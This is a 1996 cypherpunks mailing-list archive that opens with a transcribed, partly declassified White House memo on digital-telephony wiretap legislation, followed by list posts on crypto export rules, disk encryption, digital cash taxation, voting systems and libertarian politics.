I tried to keep the original spacing and relative lengths of blacked-out
areas.

	Jim Gillogly
	7 Wedmath S.R. 1996, 05:02
___________________________________________________________________

                   UNCLASSIFIED stamped over TOP SECRET


                             THE WHITE HOUSE
                                WASHINGTON
                          January 17, 1991 [sic]

 MEMORANDUM FOR THE HONORABLE DICK CHENEY
		Secretary of Defense

		THE HONORABLE WILLIAM P. BARR
		Attorney General

		THE HONORABLE ROBERT M. GATES
		Director of Central Intelligence

 SUBJECT:       Legislative Strategy for Digital
		Telephony (S)

 On December 30, 1991, I sent to the President a memorandum
 seeking his approval for a legislative strategy for digital
 telephony.  The substance of that memorandum is attached.  On
 January 15, 1992, he approved the following course of action:

      -    Justice should go ahead now to seek a
	   legislative fix to the digital telephony
	   problem, and all parties should prepare to
	   follow through on the encryption problem in
	   about a year.  Success with digital telephony
	   will lock in one major objective; we will have
	   a beachhead we can exploit for the encryption
	   fix; and the encryption access options can be
	   developed more thoroughly in the meantime.  (TS)


			       <signed>
			       Brent Scowcroft

 Attachment

		<stamped> Declassified/Released on <handwritten> 6/28/96
			      under provisions of E.O. 12958
			  by J. Saunders, National Security Council



	UNCLASSIFIED stamped over       UNCLASSIFIED stamped over
	TOP SECRET                      TOP SECRET
	Declassifiy on:  OADR
___________________________________________________________________

	    [Attachment: XXXX replaces blacked-out portions]


	UNCLASSIFIED stamped over
	TOP SECRET                        <stamped>THE PRESIDENT HAS SEEN
					   <handwritten> 1-15-92

			THE WHITE HOUSE WASHINGTON        <stamped>
			    December 29, 1991             31 DEC 30 P3:00

 ACTION

 MEMORANDUM FOR THE PRESIDENT

 FROM:          BRENT SCOWCROFT  <initials>

 SUBJECT:       Legislative strategy for Digital Telephony


 Purpose                                                    <handwritten>
								    EO
 To approve a legislative remedy to looming problems for law        12958
 enforcement XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX                   1.5
								    (C)

 Background

 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXxXXXXXXXXXXXXX

 Analog technology allows interception of a single communication    <written>
 through a tap on the target's line XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX     Same
 XXXXXXXXXXXXXXXXXXXXXXXXX  Digital technology simultaneously
 intermingles thousands of pieces of information on the line
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXe
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

 The best solution to this problem is to obtain legislation which
 ensures the cooperation of the telephone commXXXXXXXX providing
 access to target communications XXXXXXXXXXXXXXXXXXXXXXXX  All         Same
 agencies agree with this legislative approach and that we should
 do it fairly soon.  Preliminary soundings on the Hill suggest
 there is a reasonable chance of success even though these kinds
 of issues raise "civil liberties" issues with the attendant
 political fireworks.  A timely legislative vehicle is the FCC
 Authorization Bill which has passed the House and awaits action
 in the Senate.  We expect the Senate to take it up in January.

 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX       <written>
 XXXXXXXXXXXXXXXXXXXXXXXXXXX <stamp> Partially Declassified/Released 6/28/96
 XXXXXXXXXXXXXXXXXXXXXXXXXXX             under provisions of <illegible>
				    by J. Saunders, National Security Council

   UNCLASSIFIED stamped over     UNCLASSIFIED stamped over cc: Vice President
   TOP SECRET                    TOP SECRET                Chief of Staff
   Declassifiy on:  OADR

___________________________________________________________________

	UNCLASSIFIED stamped over     2         <written>
	TOP SECRET                              Delibera...
						Materi...



 <written>
 Deliberative
 Material

 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXX  The Justice view is that we should
 carefully press ahead and try to obtain a solution now.  Justice
 contends that the costs of waiting (loss of access and the cost
 to recoup) are growing rapidly, and an attempt to fix it now is
 worth the political risks.

 RECOMMENDATION

 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 XXXXXXXXXX Therefore, I recommend you give Justice the go-ahead
 to seek a fix to the digital telephony problem and direct all the
 parties to prepare to follow through on encryption in about a
 year.

	<checked>                     I prefer first to
	    /                         meet with senior
 Approve __V___   Disapprove ______   advisors to discuss ______

  <initials, underlined>
	GB



   UNCLASSIFIED stamped over     UNCLASSIFIED stamped over
   TOP SECRET                    TOP SECRET

___________________________________________________________________

Transcribed by:
----
	Jim Gillogly
	7 Wedmath S.R. 1996, 05:02




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Tue, 30 Jul 1996 04:31:13 +0800
To: cypherpunks@toad.com
Subject: Re: Publicly Verifiable Anonymous Voting System
Message-ID: <1.5.4.32.19960729162635.002edd50@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 27/07/96 -0700, JonWienk@ix.netcom.com wrote:
>Here is the how the voting system works.
>
>1.  All voting information (public keys, ballots, ballot signatures, etc.) is 
>publicly available via a Web site or other similar means, and
can be downloaded 
...

One problem with such a system is sheer complexity. Even an
illiterate person must be convinced of the transparency of the
system, i.e. that his/her vote "counts". In the conventional
system, where you mark a piece of paper that goes into a locked
box watched over by reps of the rival parties, which you can
subsequently view being opened and processed, you intuitively
understand how the system works. This was one of our arguments
(not, admittedly, our strongest) against electronic voting when
they sought to introduce it  in 1989 for the Indian federal
elections -- further details on http://www.cerfnet.com/~amehta/evmsunob.htm

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 30 Jul 1996 13:38:02 +0800
To: cypherpunks@toad.com
Subject: Re: Clinton must like terrorists...
In-Reply-To: <199607300127.SAA25730@mail.pacifier.com>
Message-ID: <JqyuRD11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

> Clinton must like terrorists... because his most recent proposals will end
> up making more of them.

Clinton is a terrorist and a murderer.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 30 Jul 1996 14:37:51 +0800
To: Darryl Gittins <darryl.gittins@edrd.dnd.ca>
Subject: Re: mailing list
In-Reply-To: <96Jul29.105559pdt.21893@hsr.edrd.dnd.ca>
Message-ID: <Pine.OSF.3.91.960729232549.29138A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Are you a good turtle?


On Mon, 29 Jul 1996, Darryl Gittins wrote:

> 
> Hey...
> 
> how do I get on the mailing lissst....?
> 
> Thanks
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 30 Jul 1996 19:04:22 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: HD Encryption
Message-ID: <199607300821.BAA23220@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:03 PM 7/28/96 +0800, Jerome Tan <jti@i-manila.com.ph> wrote:
>Is there such thing as HD encryption?

If you mean keeping the partition on your hard disk encrypted,
with blocks decrypted when you want to read them and
encrypted when you write, similar to the way Stacker and
Doublespace decompress and compress files when reading and writing, sure.  
Obviously this sort of thing is operating-system dependent....  

Most DOS commercial products that do this are not very good - they'll
offer some sort of "fast proprietary encryption" which is either weaker
than DES or FAR weaker than DES - though some use DES and a few have
triple-DES as an option.  There are several freeware products
as well,  with names like secdev and secdrv, that have good crypto.
I don't know the Macintosh market.  Some of the DOS/Windows products
work under Windows 95 or NT, some don't.

For networked environments, like Unix, there are better research-based
systems like Matt Blaze's CFS Crypto File System, but since it's written
in the US and Matt's with a large US company with many lawyers,
he's not allowed to export it to you.  There are also some commercial products.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 30 Jul 1996 19:13:30 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Source Codes in C or Pascal
Message-ID: <199607300821.BAA23226@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 7/28/96 +0800, you wrote:
>Does anyone knows where to find source codes of sample encryption 
>programs? I just wanted to know how they work... Thanks in advance!

The best archives are outside the US and not subject to its export laws.
Some popular locations are ftp.funet.fi (in Finland), ftp.ox.ac.uk
(at Oxford University in England), and ftp.dsi.unimi.it (in Italy.)
You can also use AltaVista to look for Ron Rivest's home page,
and look at his reference lists.  The Cypherpunks home page
is on www.csua.berkeley.edu .

If you're somewhere that US technical books are readily available,
Bruce Schneier's book "Applied Cryptography" is very good.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 04:51:38 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <ae223d40000210048031@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:21 PM 7/29/96, Charley Sparks wrote:

>My opinions are just that, MINE but here's a question ..
>
>In the event that drugs are legalized like alcohol ( also a drug
>) and tobacco and cafeine, who will take responsibility for
>housing and feeding those, who are now blameless, individuals
>who can't or won't take responsibility for themselves and work
>or whatever. With freedom and liberty come a lot of
>responsibility. Too many people today balme every damn thing in
>the world for their problems -  and get away with it....

"No one."

Who takes responsibility when people fail to save enough of their paycheck
to last them through the month? Who takes responsibility when people drink
too much, miss work, and are fired? And so on.

Drugs are no different from ethanol. We tried outlawing ethanol, and
eventually came to our senses. Many of us--on all sides of the ideological
spectrum--think the same is inevitable with other drugs.

The issue of "who takes care of" people who can't hold their liquor, or who
overeat, or who smoke too much, does not enter into the equation. (Though
there are pathological examples of cases where insurance companies are
trying to sue tobacco companies for the costs incurred because of smoking
by policyholders. A bad, and, I think, dreadfully abusive, use of the court
system.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Tue, 30 Jul 1996 20:56:38 +0800
To: cypherpunks@toad.com
Subject: Re: "privatizing" phones?
Message-ID: <2.2.32.19960730102239.006cc4b8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Even if they did change the frequency the call was on, 
>> it would be a simple matter to decode how the frequency
>> change was negotiated, and "follow" the call (also easily
>> accomplished with cellular calls).  Failing that, there is 
>> a very limited range of frequencies allocated for cordless 
>> fones, and simply re-scanning for the conversation is a 
>> trivial inconvenience. //cerridwyn//
>Most of those systems do also change the order of the transmitted data, and 
>that's not limited to a few possibilities. If it's digital, they usually 
>encrypt it (only weak, but hey, you normally have to find the key real 
>time!)

Right.  After posting that, I realized I forgot to specify I was only
referring to analog cordless/cell fones.  Digital is a bit of a different
story, as it requires more sophisticated equipment to decode.  Still not
secure though.  (right now it's simply obscure).  //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Tue, 30 Jul 1996 23:04:28 +0800
To: cypherpunks@toad.com
Subject: fbi, crypto, and defcon
Message-ID: <2.2.32.19960730112953.0072a3d0@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


        
At this year's DefCon (last weekend), there were two speakers from the
recently created FBI San Francisco Computer Crime division.  During a 
question/answer session, the question came up regarding their division's
view on crypto as compared to the FBI's official view.  They, of course,
declined to answer on the grounds that they were instructed not to talk
about it, and proceeded to explain how they just enforce the law, not 
create it (deftly ignoring the point made about Freeh's involvement in
making laws).  The question was rephrased: "How do you personally feel
about exporting strong crypto", and again they refused to answer on the
grounds that they were there as spokesmen for the FBI, but people could
talk to them later and ask any questions they liked, and "the answers may
surprise you".  Evidence that maybe some goons really do have a clue, but
are still too afraid to do anything about it... //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jul 1996 07:22:13 +0800
To: cypherpunks@toad.com
Subject: Re: e$: The Demographic "Transaction"
Message-ID: <ae225d5b000210042b96@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Before I get started, let me point out that the "demographic transition" is
standard fare in sociology classes. Lots of stuff on the Web about it (do a
search of that string with Alta Vista, for example, and you'll see 1000
hits).

At 7:37 PM 7/29/96, Bart  Croughs wrote:
>At monday 29 july, Arun Mehta wrote:
>
>
>>As I see it, having more children makes sound economic sense when
>>you have child labor. You feed the child for 4-5 years, after
>>which it contributes financially to the family for the rest of
>>its short life. More stringent enforcement of anti child-labor
>>legislation would help. Increase in life expectancy is also good,
>>because then you need fewer children as insurance.
>
>The only effect of more stringent enforcement of anti child-labor
>legislation is to harm the children involved. You may think that the
>millions of families in Third World countries who are too poor to provide
>for their children, will be magically become rich enough to send their
>children to school once the anti child-labor legislation will be enforced.
>This is not the case. When the

(end quote...Bart, your lines are apparently way longer than 72-80 characters!)

What I want is for the world's billions of children to have mandated
benefits comparable to what the children of the elite in America have! And
if there is not enough money to pay for this standard of living, we can
just print more!

(I would never let _my_ children, Biff and Buffy, interrupt their tennis
camp experiences by working a job for less than what they will eventually
earn as management coaches and wellness advisors, and I will work to ensure
that children in Third World nations are not similarly disgraced by doing
manual labor. And if they and their families go hungry as a result of my
principles, they will have won the moral victory. And a few of them might
even advance to the finals at Forest Hills!)

--Tim May

P.S. Since many on the CP list seem to miss signals, this piece reflects my
views that the current outrage over "child labor" will merely end up
killing a bunch of children who otherwise might have earned enough to eat.
Food is not simply distributed for free, and if children cannot find work
in Kathy Lee's Sweatshop Apparel Factory, and assuming that "tennis camps"
are not the alternative, the effect of First World holy righteousness will
be killing off a lot of these kids. Maybe not such a bad thing, given the 7
billion world population. Even better, of course, would be adopting a
laissez-faire approach.

Me, I wear linen/cotton shirts produced in Bangla Desh, probably by hordes
of poorly-paid Bengalis. But, since the likely alternative for them is
sitting in the mud swatting horseflies and watching the water buffaloes
until starvation eventually claims them, I feel great about wearing "slave
labor-produced" goods!

And why can't we work to outlaw the "manufacturing sector jobs" in the U.S.
economy, the ones that only pay $22 an hour for boring labor? After all,
$22/hour is hardly enough to send Biff and Muffy to tennis camp, let alone
the proper prep schools, let alone the $250K needed to send them to a good
Ivy League school. These blue-collar workers are being exploited by the
capital class and need to be liberated from these jobs.

Let them eat cake.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 30 Jul 1996 20:43:49 +0800
To: cypherpunks@toad.com
Subject: TLAs on cypherpnks (was R
Message-ID: <TCPSMTP.16.7.30.5.35.40.2645935021.657652@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Is this the first confirmed report of TLA cypherpunk-monitoring?

 Might be the first reported, but many people probably thought it was...
 I did...


 P.J.
 pjn@nworks.com




... RAM = Rarely Adequate Memory

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jul 1996 00:25:19 +0800
To: Julian Assange <coderpunks@toad.com
Subject: Re: DESZIP
Message-ID: <v02120d27ae23b7fa368c@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:01 7/30/96, Julian Assange wrote:

>In the late 80's Matt Bishop while at NASA, wrote DESZIP, which for a
>while was the seminal work. Matt has pointed me to a US summer 1987
>article which describes some of the DES optimisations, however as I am
>an Australian national, Matt can not legally send me the actual
>implimentation to me due to idiotic ITAR restrictions.

Did you try the Usual Suspects? There are numerous crypto sites in Europe.
If none of them has DESZIP, would someone outside the US please upload
it...



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 30 Jul 1996 23:14:39 +0800
To: cypherpunks@toad.com
Subject: Taxes in the digicash world
Message-ID: <199607301117.GAA06799@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi

Suppose that digital cash becomes easy enough to use and becomes the
mainstream medium in most [or at least many] economic transactions.

The question is, how can the government TECHNICALLY collect taxes?
I do not mean to start `libertarianism vs. socialism' discussion, I
am more interested in the technical aspects of tax collection when
transfers of money are protected by strong crypto..

Let's say, maybe this tax would work: every time someone verifies that
a piece of digital cash is valid, s/he has to pay the government a little
percentage of the amount. Since digital banks are easier to control than
other participants of the market, this kind of tax legislation is easier to
enforce.

Of course these banks may be offshore, and then such collection
becomes problemstic.

Another alternative that I see is property taxes and poll taxes,or
taxes on some commodities such as oil. But incomes seem to be hard to 
track.

What else?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@netapp.com (Dave Koontz)
Date: Wed, 31 Jul 1996 01:00:44 +0800
To: jimbell@pacifier.com
Subject: Re:  Clinton must like terrorists...
Message-ID: <9607301322.AA13357@supernova.netapp.com>
MIME-Version: 1.0
Content-Type: text/plain


>Clinton must like terrorists... because his most recent proposals will end 
>up making more of them.

Maybe he is trying to foment revolution?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Tue, 30 Jul 1996 22:51:48 +0800
To: cypherpunks@toad.com
Subject: Some Questions RE: Nortons For Your Eyes Only
Message-ID: <199607301045.GAA08042@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Tue Jul 30 06:40:47 1996

For those of you who have not heard it, Norton's For Your Eyes Only is a 
piece of software designed to integrate several encryption functions into 
Win95. Among its features (as I understand it) are automatically 
encrypting/decrypting on the fly (ala Secure Drive), encryption of the HD 
boot info, Command auditing, and a hybrid crypto system based on RSA. 
Several symmetric algorithms are available including RC4, 3DES and 
Blowfish.  Non-US versions do not include the strong crypto algorithms.

I only have second-hand information about this program and have a few 
questions regarding it.

1. Apparently, For Your Eyes Only (FYEO for short) encrypts files using a 
user-selectable symmetric algorithm and then encrypts the session key with 
RSA. Does FYEO store this encrypted session key with the rest of the file 
(like PGP does), or does it keep a central database of encrypted session 
keys? Keeping the session keys centrally would obviously prevent sharing 
files across machines, so I imagine that they must be appended (or 
prepended) to the ciphertext.

2. From what I understand, FYEO prompts you to enter your passphrase when 
logging in and this passphrase unlocks your RSA key. What algorithm is used 
to encrypt the RSA key? I am concerned that an exportable (and therefore 
weak) algorithm is used to protect the RSA key.  This would mean that the 
RSA key could be readily hacked. And if the RSA secret key can be hacked 
easily, it will do no good at all to have strong encryption on the files 
themselves.

3. Does FYEO include any kind of authentication system. If so, what 
signature and message digest algorithms does it use?

Thanks.
- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMf3msOSLhCBkWOspAQHN4gf9HeVeJ6a6oKwdmtwcHhFT0cnMjdFIjP4V
zcc7Is7qPSMFTZy+1+IwITiXPUugHdxeJbI2JvUyfptbjllfqvacNGy54iIqRZhz
DPqaQkeZ8hjj843kZQB1/tmcA+np3jR6C3p3s5PC8np8Ld36J8rQZ6DVNi3XSoSh
6rOXlQKpmxZgq2gtCK+wydG39rvMsKDYo+ATqHZbX+0lryi3+4RI6Yi4185rrMW4
8iMwZs7VHFnl7sicaIro101Gc3xmrMzj+lRfa0kR1G3Ek2x9I7TArKRmcz2qonZM
dUJivrjf52rUK+9Mi95HzeI6Sakb6iSIBaP7OO3w/IIIV1W6ufiqIg==
=M3JW
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 30 Jul 1996 23:07:12 +0800
To: cypherpunks@toad.com
Subject: The Ironic Arms Trafficker
Message-ID: <199607301128.HAA99044@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the August 12, 1996 issue of Forbes, on page 38, is a half-page or so
by Janet Novack titled, _The Accidental Arms Trafficker._ She quotes CEO
Michael Zisman, of IBM's Lotus Development Corp. saying, "Theoretically,
when I take my laptop and get on an airplane and go to London, I am
violating the law."

Goes on to talk briefly about ITAR and the quiet change by the State Dept.
in travel rules, mentions Zisman is in DC lobbying for Pro-Code, calls 64
bit Lotus Notes encryption "advanced," and talks about competitors beating
Lotus to market. [I suppose Zisman hasn't been listening to Dr. Sternlight
or Freeh (whose head, say the Bethesda proctologists, is now stuck *even*
*deeper*! ;}] Anyway, no mention of Lotus' Big-Brother Inside proposal,
hence my use of the term "ironic."
JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

        "Isn't it odd that Harry Browne is dominating talk radio
...while his campaign continues to be overlooked by mainstream
newspapers and television news?" asked campaign director Sharon Ayres.

        "Is Harry Browne being deliberately ignored, or is the rest of
the media just slow to catch on to this genuine grassroots political
phenomenon?" she asked.

"Both." I answered. [See the Miami Herald for no details.]

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMf3w+G1lp8bpvW01AQGs9AP/bRhHsroIfyfwOwxoprBmop0lFiRifBaF
BA8mpxflDHKUnguuYEBiLKMVS4mW2F8O/tzg13iFlqnbljMTQnSCv3RxhSVL6vMo
fcvekwAb0vh/GfumqqXWBupsap+YOoGI/4YIJgZBi/L4LfGlT++qCzdcRoHBSebQ
YDAOPG6UaXw=
=yB35
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 31 Jul 1996 02:12:04 +0800
To: "'source@iaccess.za>
Subject: RE: Implementing KEA in Software
Message-ID: <01BB7DEE.844937E0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	source@iaccess.za[SMTP:source@iaccess.za]
Sent: 	Monday, July 29, 1996 12:42 PM
To: 	coderpunks@toad.com
Subject: 	Re: Implementing KEA in Software

The restricted hardware implementation of KEA classification does not 
affect
us(people outside of the USA), and therefore is "unrestricted" to us in our 
minds, so please note, this request is only for those prepared to make it
avalaible, not for those who want to let us know that it is restricted.

You are asking if there;s someone around willing to commit espionage: 
releasing US Government Classified information?  You are asking to 
illegally obtain US Government Classified documents?
Ummmmm.... maybe you need to be a little more covert.

Or perhaps you are just simply painfully unaware of the difference between 
US crypto export restrictions (ITAR),
and laws pertaining to illegally obtaining and releasing Classified stuff.

In ether case you don't look so good.





Regards,

The Power Team

SMTP:   source@iaccess.za
HTTP:   http://www.compusource.co.za
FTP:    ftp://ftp.compusource.co.za

Tel:    +27-21-75-9197
FAX:    +27-21-72-8005

Postal: Building 6, Room 201,
        CompuSource (Pty) Ltd
        PO Box 510, Constantia, 7848, South Africa.

